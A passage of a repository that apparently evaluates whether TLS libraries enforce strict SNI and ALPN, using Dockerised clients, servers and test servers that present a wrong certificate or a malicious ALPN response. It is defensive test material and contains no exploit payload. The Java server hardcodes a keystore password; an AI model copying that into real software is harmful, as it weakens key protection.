tls.Dial("tcp", host+":"+port, conf) 63 | if err != nil { 64 | log.Println(err) 65 | if strings.Contains(err.Error(), "server selected unadvertised ALPN protocol") { 66 | os.Exit(120) 67 | } else if strings.Contains(err.Error(), "x509: certificate is valid for") { 68 | os.Exit(42) 69 | } 70 | os.Exit(1) 71 | } 72 | 73 | // Send message to server 74 | n, err := conn.Write([]byte("Hello from Client!\n")) 75 | if err != nil { 76 | log.Println(n, err) 77 | os.Exit(2) 78 | return 79 | } 80 | 81 | // Receive message from server 82 | buf := make([]byte, 100) 83 | n, err = conn.Read(buf) 84 | if err != nil { 85 | log.Println(n, err) 86 | os.Exit(3) 87 | return 88 | } 89 | print(string(buf[:n])) 90 | 91 | defer conn.Close() 92 | os.Exit(0) 93 | } 94 | -------------------------------------------------------------------------------- /evaluation-libraries/golang/client/go.mod: -------------------------------------------------------------------------------- 1 | module client 2 | 3 | go 1.17 4 | -------------------------------------------------------------------------------- /evaluation-libraries/golang/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | golang-server: 8 | image: tls-golang 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | golang-client: 16 | image: tls-golang 17 | depends_on: 18 | - golang-server 19 | - openssl-server-wrong-cn 20 | - openssl-malicious-alpn 21 | command: [ "/client.sh", "/client", "golang-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] -------------------------------------------------------------------------------- /evaluation-libraries/golang/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from golang-client --remove-orphans -------------------------------------------------------------------------------- /evaluation-libraries/golang/server/go.mod: -------------------------------------------------------------------------------- 1 | module server 2 | 3 | go 1.17 4 | -------------------------------------------------------------------------------- /evaluation-libraries/golang/server/server.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "crypto/tls" 6 | "errors" 7 | "flag" 8 | "log" 9 | "net" 10 | "runtime" 11 | ) 12 | 13 | var servername = "tls-server.com" 14 | var certificate = "certs/tls-server.com-chain.crt" 15 | var privatekey = "certs/tls-server.com.key" 16 | var port = ":4433" 17 | var alpn = []string{"http/1.1"} 18 | 19 | func main() { 20 | log.SetFlags(log.LstdFlags) 21 | 22 | println("Using GO:" + runtime.Version()) 23 | 24 | // Get commandline arguments 25 | flag.StringVar(&servername, "s", "tls-server.com", "servername for SNI") 26 | flag.StringVar(&alpn[0], "a", "http/1.1", "ALPN") 27 | flag.StringVar(&certificate, "c", "/etc/ssl/cert-data/tls-server.com-chain.crt", "certifcate") 28 | flag.StringVar(&privatekey, "k", "/etc/ssl/cert-data/tls-server.com.key", "private key") 29 | flag.Parse() 30 | println("Parameters servername=" + servername + " alpn=" + alpn[0] + " cert=" + certificate + " key=" + privatekey) 31 | 32 | // Load certificate and private key 33 | cer, err := tls.LoadX509KeyPair(certificate, privatekey) 34 | if err != nil { 35 | log.Println(err) 36 | return 37 | } 38 | 39 | conf := &tls.Config{ 40 | Certificates: []tls.Certificate{cer}, 41 | MinVersion: tls.VersionTLS12, 42 | ServerName: servername, 43 | NextProtos: alpn, 44 | } 45 | 46 | if runtime.Version() < "go1.17" { 47 | println("Strict ALPN not implemented in go version. Overriding VerifyConnection") 48 | // Assign a custom function for VerifyConnection 49 | // if no ALPN is negotiated abort the handshake 50 | // it is not possible to access the protocol sent by the client if no ALPN could be negotiated 51 | // so it's not possible to accept the connection if no ALPN is sent 52 | // if the wrong hostname is sent abort the connection 53 | // if no hostname is sent continue 54 | conf.VerifyConnection = func(cs tls.ConnectionState) error { 55 | if cs.NegotiatedProtocol == "" { 56 | return errors.New("INVALID ALPN") 57 | } else if cs.ServerName != servername && len(cs.ServerName) > 0 { 58 | return errors.New("INVALID SNI: " + cs.ServerName) 59 | } else { 60 | log.Println("ALPN:", cs.NegotiatedProtocol) 61 | log.Println("SNI:", cs.ServerName) 62 | return nil 63 | } 64 | } 65 | } else { 66 | conf.VerifyConnection = func(cs tls.ConnectionState) error { 67 | if cs.ServerName != servername && len(cs.ServerName) > 0 { 68 | return errors.New("INVALID SNI: " + cs.ServerName) 69 | } else { 70 | return nil 71 | } 72 | } 73 | } 74 | 75 | // Listen for connections 76 | ln, err := tls.Listen("tcp", port, conf) 77 | if err != nil { 78 | log.Println(err) 79 | return 80 | } 81 | defer ln.Close() 82 | 83 | for { 84 | conn, err := ln.Accept() 85 | if err != nil { 86 | log.Println(err) 87 | continue 88 | } 89 | go handleConnection(conn) 90 | } 91 | } 92 | 93 | func handleConnection(conn net.Conn) { 94 | defer conn.Close() 95 | r := bufio.NewReader(conn) 96 | for { 97 | // Receive message from Client 98 | msg, err := r.ReadString('\n') 99 | if err != nil { 100 | log.Println(err) 101 | return 102 | } 103 | print(msg) 104 | 105 | // Send message to Client 106 | n, err := conn.Write([]byte("Hello from Server!\n")) 107 | if err != nil { 108 | log.Println(n, err) 109 | return 110 | } 111 | } 112 | } 113 | -------------------------------------------------------------------------------- /evaluation-libraries/java/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-java 3 | ARG VERSION=4.8.1-stable 4 | RUN apk add openjdk11-jdk 5 | ADD client /client 6 | ADD server /server 7 | WORKDIR /client/bin 8 | RUN javac -cp ../lib/java-getopt-1.0.14.jar -d . ../src/Client.java 9 | RUN jar cmf ../manifest Client.jar Client.class 10 | WORKDIR /server/bin 11 | RUN javac -cp ../lib/java-getopt-1.0.14.jar -d . ../src/Server.java 12 | RUN jar cmf ../manifest Server.jar Server.class 13 | WORKDIR / 14 | COPY --from=tls-openssl /openssl-client /openssl-client 15 | CMD ["java", "-jar", "/server/bin/Server.jar"] 16 | -------------------------------------------------------------------------------- /evaluation-libraries/java/README.md: -------------------------------------------------------------------------------- 1 | # Java tls example with strict sni and strict alpn 2 | 3 | Tested with openjdk11 and openjdk17 4 | 5 | uses java-getopt for command-line interface https://directory.fsf.org/wiki/Java-getopt 6 | 7 | ```bash 8 | ./run.sh 9 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/java/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-java -f Dockerfile -------------------------------------------------------------------------------- /evaluation-libraries/java/client/README.md: -------------------------------------------------------------------------------- 1 | https://docs.oracle.com/en/java/javase/16/security/java-secure-socket-extension-jsse-reference-guide.html#GUID-59618539-24AD-431E-84E3-585C4C4BF4E5 -------------------------------------------------------------------------------- /evaluation-libraries/java/client/lib/java-getopt-1.0.14.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/evaluation-libraries/java/client/lib/java-getopt-1.0.14.jar -------------------------------------------------------------------------------- /evaluation-libraries/java/client/manifest: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: Client 3 | Class-path: ../lib/java-getopt-1.0.14.jar 4 | -------------------------------------------------------------------------------- /evaluation-libraries/java/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | java-server: 8 | image: tls-java 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | java-client: 16 | image: tls-java 17 | command: [ "/client.sh", "java -Djavax.net.ssl.trustStore=certs/ca.crt -jar /client/bin/Client.jar", "java-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - java-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn 22 | -------------------------------------------------------------------------------- /evaluation-libraries/java/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from java-client --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-libraries/java/server/README.md: -------------------------------------------------------------------------------- 1 | https://docs.oracle.com/en/java/javase/16/security/java-secure-socket-extension-jsse-reference-guide.html#GUID-59618539-24AD-431E-84E3-585C4C4BF4E5 -------------------------------------------------------------------------------- /evaluation-libraries/java/server/lib/java-getopt-1.0.14.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/evaluation-libraries/java/server/lib/java-getopt-1.0.14.jar -------------------------------------------------------------------------------- /evaluation-libraries/java/server/manifest: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: Server 3 | Class-path: ../lib/java-getopt-1.0.14.jar 4 | -------------------------------------------------------------------------------- /evaluation-libraries/java/server/src/Server.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.security.KeyStore; 3 | import java.util.*; 4 | import javax.net.ssl.*; 5 | 6 | import gnu.getopt.Getopt; 7 | 8 | public class Server { 9 | public static String keyFile = "/etc/ssl/cert-data/tls-server.com.p12"; 10 | public static String keyPassword = "123456"; 11 | public static String[] protocols = new String[] { "TLSv1.2", "TLSv1.3" }; 12 | public static String[] alpn = { "http/1.1" }; 13 | public static String servername = "tls-server.com"; 14 | public static int port = 4433; 15 | 16 | public static void main(String[] argv) throws Exception { 17 | 18 | // Get commandline arguments with GetOpt 19 | Getopt g = new Getopt("Server", argv, "a:s:k:p:"); 20 | int opt; 21 | while ((opt = g.getopt()) != -1) { 22 | switch (opt) { 23 | case 'a': 24 | alpn[0] = g.getOptarg(); 25 | break; 26 | case 's': 27 | servername = g.getOptarg(); 28 | break; 29 | case 'k': 30 | keyFile = g.getOptarg(); 31 | break; 32 | case 'p': 33 | port = Integer.parseInt(g.getOptarg()); 34 | break; 35 | default: 36 | System.out.print("Usage: %s [-a alpn] [-s servername] [-t target] [-c certfile] [-p port]"); 37 | } 38 | } 39 | System.out.println( 40 | "Parameters servername=" + servername + " alpn=" + alpn[0] + " key=" + keyFile + " port=" + port); 41 | 42 | SSLContext ctx = SSLContext.getInstance("TLS"); 43 | 44 | // Create Keystore 45 | KeyStore keyKS = KeyStore.getInstance("PKCS12"); 46 | keyKS.load(new FileInputStream(keyFile), keyPassword.toCharArray()); 47 | 48 | // Generate KeyManager 49 | KeyManagerFactory kmf = KeyManagerFactory.getInstance("PKIX"); 50 | kmf.init(keyKS, keyPassword.toCharArray()); 51 | KeyManager[] kms = kmf.getKeyManagers(); 52 | 53 | // Initialize SSLContext using the new KeyManager 54 | ctx.init(kms, null, null); 55 | 56 | // Instead of using SSLServerSocketFactory.getDefault(), 57 | // get a SSLServerSocketFactory based on the SSLContext 58 | SSLServerSocketFactory sslssf = ctx.getServerSocketFactory(); 59 | SSLServerSocket sslServerSocket = (SSLServerSocket) sslssf.createServerSocket(port); 60 | 61 | while (true) { 62 | // Listen for connectionss 63 | SSLSocket sslSocket = (SSLSocket) sslServerSocket.accept(); 64 | SSLParameters sslp = sslSocket.getSSLParameters(); 65 | 66 | // Set SNI hostname, the matcher aborts the connection if the servername is not 67 | // found 68 | SNIMatcher matcher = SNIHostName.createSNIMatcher(servername); 69 | Collection matchers = new ArrayList<>(1); 70 | matchers.add(matcher); 71 | sslp.setSNIMatchers(matchers); 72 | 73 | // Add ALPN to the SSL parameters 74 | // Java will abort the connection if there is a mismatch in the Protocols 75 | sslp.setApplicationProtocols(alpn); 76 | 77 | sslSocket.setSSLParameters(sslp); 78 | sslSocket.setEnabledProtocols(protocols); 79 | 80 | // Do the handshake 81 | try { 82 | sslSocket.startHandshake(); 83 | 84 | String ap = sslSocket.getApplicationProtocol(); 85 | System.out.println("ALPN: \"" + ap + "\""); 86 | 87 | // Send message to client 88 | PrintWriter out = new PrintWriter( 89 | new BufferedWriter(new OutputStreamWriter(sslSocket.getOutputStream()))); 90 | out.println("Hello from Server!"); 91 | out.flush(); 92 | 93 | // Get message from client 94 | BufferedReader in = new BufferedReader(new InputStreamReader(sslSocket.getInputStream())); 95 | String inputLine; 96 | while ((inputLine = in.readLine()) != null) 97 | System.out.println(inputLine); 98 | } catch (javax.net.ssl.SSLHandshakeException e) { 99 | System.out.println(e); 100 | sslSocket.close(); 101 | continue; 102 | } catch (java.net.SocketException e) { 103 | System.out.println(e); 104 | sslSocket.close(); 105 | continue; 106 | } catch (javax.net.ssl.SSLException e) { 107 | System.out.println(e); 108 | sslSocket.close(); 109 | continue; 110 | } 111 | 112 | sslSocket.close(); 113 | } 114 | } 115 | } -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-mbedtls VERSION 0.1.0) 3 | 4 | add_subdirectory(client) 5 | add_subdirectory(server) 6 | -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-mbedtls 3 | ARG VERSION=2.18 4 | WORKDIR /build 5 | RUN git clone --depth=1 --branch=archive/mbedtls-${VERSION} https://github.com/ARMmbed/mbedtls 6 | WORKDIR /build/mbedtls 7 | RUN git submodule update --init --recursive 8 | RUN cmake -DCMAKE_BUILD_TYPE=Debug . && make install 9 | WORKDIR /build 10 | ADD server /build/server 11 | ADD client /build/client 12 | ADD CMakeLists.txt /build/CMakeLists.txt 13 | RUN cmake . .. && make 14 | RUN mv /build/server/server / 15 | RUN mv /build/client/client / 16 | COPY --from=tls-openssl /openssl-client /openssl-client 17 | WORKDIR / 18 | CMD ["/server"] -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/README.md: -------------------------------------------------------------------------------- 1 | # mbed tls example with strict sni and strict alpn 2 | 3 | Tested with mbedtls 2.18 4 | 5 | based on ssl_client1.c and ssl_server.c from mbedtls 6 | https://github.com/ARMmbed/mbedtls/tree/development/programs/ssl 7 | 8 | ```bash 9 | ./run.sh 10 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=2.18 . -t tls-mbedtls -f Dockerfile 2 | -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(client VERSION 0.1.0) 3 | 4 | 5 | add_library(mbedtls STATIC IMPORTED) 6 | set_target_properties(mbedtls PROPERTIES 7 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/library/libmbedtls.a" 8 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/include" 9 | ) 10 | add_library(mbedx509 STATIC IMPORTED) 11 | set_target_properties(mbedx509 PROPERTIES 12 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/library/libmbedx509.a" 13 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/include" 14 | ) 15 | add_library(mbedcrypto STATIC IMPORTED) 16 | set_target_properties(mbedcrypto PROPERTIES 17 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/crypto/library/libmbedcrypto.a" 18 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/crypto/include" 19 | ) 20 | 21 | add_executable(client client.c) 22 | target_link_libraries(client mbedx509 mbedtls mbedcrypto) 23 | target_compile_options(client PRIVATE -Wall -Wextra) 24 | -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | mbedtls-server: 8 | image: tls-mbedtls 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | mbedtls-client: 16 | image: tls-mbedtls 17 | command: [ "./client.sh", "/client", "mbedtls-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - mbedtls-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from mbedtls-client --remove-orphans -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(server VERSION 0.1.0) 3 | 4 | 5 | add_library(mbedtls STATIC IMPORTED) 6 | set_target_properties(mbedtls PROPERTIES 7 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/library/libmbedtls.a" 8 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/include" 9 | ) 10 | add_library(mbedx509 STATIC IMPORTED) 11 | set_target_properties(mbedx509 PROPERTIES 12 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/library/libmbedx509.a" 13 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/include" 14 | ) 15 | add_library(mbedcrypto STATIC IMPORTED) 16 | set_target_properties(mbedcrypto PROPERTIES 17 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/crypto/library/libmbedcrypto.a" 18 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/crypto/include" 19 | ) 20 | 21 | add_executable(server server.c) 22 | target_link_libraries(server mbedx509 mbedtls mbedcrypto) 23 | target_compile_options(server PRIVATE -Wall -Wextra) 24 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/.gitignore: -------------------------------------------------------------------------------- 1 | build 2 | .vscode 3 | CPackConfig.cmake 4 | CPackSourceConfig.cmake 5 | DartConfiguration.tcl 6 | boringssl2 7 | CMakeLists.txt.user 8 | CMakeCache.txt 9 | CMakeFiles 10 | CMakeScripts 11 | Testing 12 | Makefile 13 | cmake_install.cmake 14 | install_manifest.txt 15 | compile_commands.json 16 | CTestTestfile.cmake 17 | _deps 18 | 19 | client/178.crt 20 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-boringssl VERSION 0.1.0) 3 | 4 | add_subdirectory(client) 5 | add_subdirectory(server) 6 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/Dockerfile-boringssl: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-boringssl 3 | ARG VERSION=3945 4 | RUN git clone --depth=1 https://boringssl.googlesource.com/boringssl 5 | #RUN git clone --depth=1 -b ${VERSION} https://boringssl.googlesource.com/boringssl 6 | WORKDIR /src/boringssl 7 | RUN cmake . && make 8 | RUN mv crypto/libcrypto.a /lib/libcrypto.a 9 | RUN mv ssl/libssl.a /lib/libssl.a 10 | RUN mv include/* /usr/include/ 11 | 12 | WORKDIR /build 13 | ADD server /build/server 14 | ADD client /build/client 15 | ADD CMakeLists.txt /build/CMakeLists.txt 16 | RUN cmake . .. && make 17 | RUN mv /build/server/server / 18 | RUN mv /build/client/client / 19 | COPY --from=tls-openssl /openssl-client /openssl-client 20 | WORKDIR / 21 | CMD ["/server"] -------------------------------------------------------------------------------- /evaluation-libraries/openssl/Dockerfile-openssl: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-openssl 3 | #ARG VERSION=1_1_1 4 | #RUN git clone --depth=1 -b OpenSSL_${VERSION}-stable https://github.com/openssl/openssl 5 | RUN git clone --depth=1 -b openssl-3.0 https://github.com/openssl/openssl 6 | WORKDIR /src/openssl 7 | RUN ./config no-async 8 | RUN make 9 | RUN make install 10 | RUN cp libcrypto.a /lib/libcrypto.a 11 | RUN cp libssl.a /lib/libssl.a 12 | RUN cp -r -L include/* /usr/include/ 13 | 14 | WORKDIR /build 15 | ADD server /build/server 16 | ADD client /build/client 17 | ADD CMakeLists.txt /build/CMakeLists.txt 18 | RUN cmake . .. && make 19 | RUN mv /build/server/server /openssl-server 20 | RUN mv /build/client/client /openssl-client 21 | RUN rm -r /build/* 22 | RUN rm -r /usr/include/openssl 23 | RUN rm /lib/libcrypto.a 24 | RUN rm /lib/libssl.a 25 | WORKDIR / 26 | CMD ["/openssl-server"] -------------------------------------------------------------------------------- /evaluation-libraries/openssl/README.md: -------------------------------------------------------------------------------- 1 | # openssl and boringssl example with strict sni and strict alpn 2 | 3 | This library creates containers for openssl and boringssl since they are almost code-compatible. 4 | 5 | needs tls-baseimage already in docker 6 | 7 | Tested openSSL 1.1.0, 1.1.1, 3.0 and BoringSSL/master from November 2021 8 | 9 | roughly based on https://wiki.openssl.org/index.php/SSL/TLS_Client and https://wiki.openssl.org/index.php/Simple_TLS_Server 10 | 11 | ```bash 12 | ./run.sh 13 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/openssl/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=1_1_1 . -t tls-openssl -f Dockerfile-openssl 2 | docker build --build-arg VERSION=3945 . -t tls-boringssl -f Dockerfile-boringssl 3 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(client VERSION 0.1.0) 3 | 4 | find_package(OpenSSL REQUIRED) 5 | 6 | add_executable(client client.c) 7 | target_link_libraries(client ${CMAKE_DL_LIBS} ssl crypto pthread dl) 8 | target_compile_options(client PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/openssl/client/client.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | void PrintSSLError(FILE *file, const char *msg, int ssl_err, int ret); 10 | 11 | static void InfoCallback(const SSL *ssl, int type, int value); 12 | 13 | static int error_callback(const char *str, size_t len, void *err); -------------------------------------------------------------------------------- /evaluation-libraries/openssl/docker-compose-boringssl.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | openssl-server-wrong-cn: 8 | image: tls-openssl 9 | command: 10 | [ 11 | "/openssl-server", 12 | "-k", 13 | "/etc/ssl/cert-data/wrong-cn.com.key", 14 | "-c", 15 | "/etc/ssl/cert-data/wrong-cn.com-chain.crt", 16 | ] 17 | openssl-malicious-alpn: 18 | image: tls-openssl 19 | command: ["/openssl-server", "-m"] 20 | boringssl-server: 21 | image: tls-boringssl 22 | boringssl-client: 23 | image: tls-boringssl 24 | depends_on: 25 | - boringssl-server 26 | - openssl-server-wrong-cn 27 | - openssl-malicious-alpn 28 | command: 29 | [ 30 | "/client.sh", 31 | "/client", 32 | "boringssl-server", 33 | "openssl-server-wrong-cn", 34 | "openssl-malicious-alpn", 35 | "6", 36 | ] 37 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | openssl-server: 8 | image: tls-openssl 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: 12 | [ 13 | "/openssl-server", 14 | "-k", 15 | "/etc/ssl/cert-data/wrong-cn.com.key", 16 | "-c", 17 | "/etc/ssl/cert-data/wrong-cn.com-chain.crt", 18 | ] 19 | openssl-malicious-alpn: 20 | image: tls-openssl 21 | command: ["/openssl-server", "-m"] 22 | openssl-client: 23 | image: tls-openssl 24 | depends_on: 25 | - openssl-server 26 | - openssl-server-wrong-cn 27 | - openssl-malicious-alpn 28 | command: 29 | [ 30 | "/client.sh", 31 | "/openssl-client", 32 | "openssl-server", 33 | "openssl-server-wrong-cn", 34 | "openssl-malicious-alpn", 35 | "1", 36 | ] 37 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --exit-code-from openssl-client --remove-orphans 3 | docker-compose -f docker-compose-boringssl.yml -p "boringssl" up --exit-code-from boringssl-client --remove-orphans -------------------------------------------------------------------------------- /evaluation-libraries/openssl/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(server VERSION 0.1.0) 3 | 4 | find_package(OpenSSL REQUIRED) 5 | add_executable(server server.c) 6 | target_link_libraries(server ${CMAKE_DL_LIBS} ssl crypto pthread dl) 7 | target_compile_options(server PRIVATE -Wall -Wextra) 8 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/server/server.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | int create_socket(uint16_t p); 12 | 13 | #ifdef OPENSSL_IS_BORINGSSL 14 | static int alpn_cb(SSL *ssl, const uint8_t **out, uint8_t *out_len, const uint8_t *in, unsigned in_len, void *arg); 15 | #else 16 | static int alpn_cb(SSL *ssl, const unsigned char **out, unsigned char *out_len, const unsigned char *in, unsigned int in_len, void *arg); 17 | #endif 18 | 19 | static int sni_cb(SSL *s, int *al, void *arg); 20 | -------------------------------------------------------------------------------- /evaluation-libraries/run-everything.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # validate current path 4 | CURRENT=`pwd` 5 | BASENAME=`basename "$CURRENT"` 6 | if [ "$BASENAME" != "evaluation-libraries" ]; then 7 | echo "Please start from the evaluation-libraries folder" 8 | exit 9 | fi 10 | 11 | RED='\033[0;31m ' 12 | GREEN='\033[0;32m ' 13 | NC='\033[0m' # No Color 14 | 15 | 16 | ./build-everything.sh 17 | 18 | # go into every library folder 19 | # 1. run containers and tests 20 | # 2. get results file from docker container 21 | # 3. append them to the results file on the host 22 | rm results 23 | for library in bearssl botan gnutls java golang mbedtls openssl wolfssl rustls ; do 24 | (cd "$library" 25 | ./run.sh 26 | containerid=$(docker-compose ps -q $library-client) 27 | echo "Getting results file from container :$containerid" 28 | docker cp $containerid:/results results-temp 29 | echo -e "${NC}$library" >> ../results 30 | cat results-temp >> ../results 31 | rm results-temp 32 | ); 33 | done 34 | 35 | # boringssl is included in the openssl folder so we need to get the file manually 36 | cd openssl 37 | containerid=$(docker-compose -f docker-compose-boringssl.yml -p "boringssl" ps -q boringssl-client) 38 | echo "Getting results file from container :$containerid" 39 | docker cp $containerid:/results results-temp 40 | echo -e "${NC}boringssl" >> ../results 41 | cat results-temp >> ../results 42 | rm results-temp 43 | cd .. 44 | 45 | cat results 46 | #remove colors from output 47 | sed -r "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" results > results-temp 48 | mv results-temp results 49 | -------------------------------------------------------------------------------- /evaluation-libraries/rustls/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "alpaca-rustls" 3 | version = "0.0.1" 4 | edition = "2018" 5 | description = "Rustls example." 6 | publish = false 7 | 8 | [dependencies] 9 | rustls = "0.20.0" 10 | rustls-pemfile = "0.2.0" 11 | clap = "~2.27.0" 12 | mio = { version = "0.7", features = ["os-poll", "tcp"] } 13 | 14 | 15 | [[bin]] 16 | name = "server" 17 | path = "server/server.rs" 18 | 19 | [[bin]] 20 | name = "client" 21 | path = "client/client.rs" -------------------------------------------------------------------------------- /evaluation-libraries/rustls/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-rustls 3 | RUN apk add cargo 4 | WORKDIR /build 5 | ADD server /build/server 6 | ADD client /build/client 7 | ADD Cargo.toml /build/Cargo.toml 8 | RUN cargo build --release 9 | 10 | RUN mv /build/target/release/server /server 11 | RUN mv /build/target/release/client /client 12 | 13 | COPY --from=tls-openssl /openssl-client /openssl-client 14 | WORKDIR / 15 | CMD ["/server"] 16 | -------------------------------------------------------------------------------- /evaluation-libraries/rustls/README.md: -------------------------------------------------------------------------------- 1 | # rustls example with strict sni and strict alpn 2 | 3 | Tested with rustls 0.20.0 4 | 5 | based on https://github.com/rustls/rustls/blob/main/rustls-mio/examples/ 6 | 7 | needs tls-baseimage already in docker 8 | 9 | 10 | ```bash 11 | ./run.sh 12 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/rustls/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=0.20.0 . -t tls-rustls -f Dockerfile -------------------------------------------------------------------------------- /evaluation-libraries/rustls/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | rustls-server: 8 | image: tls-rustls 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", 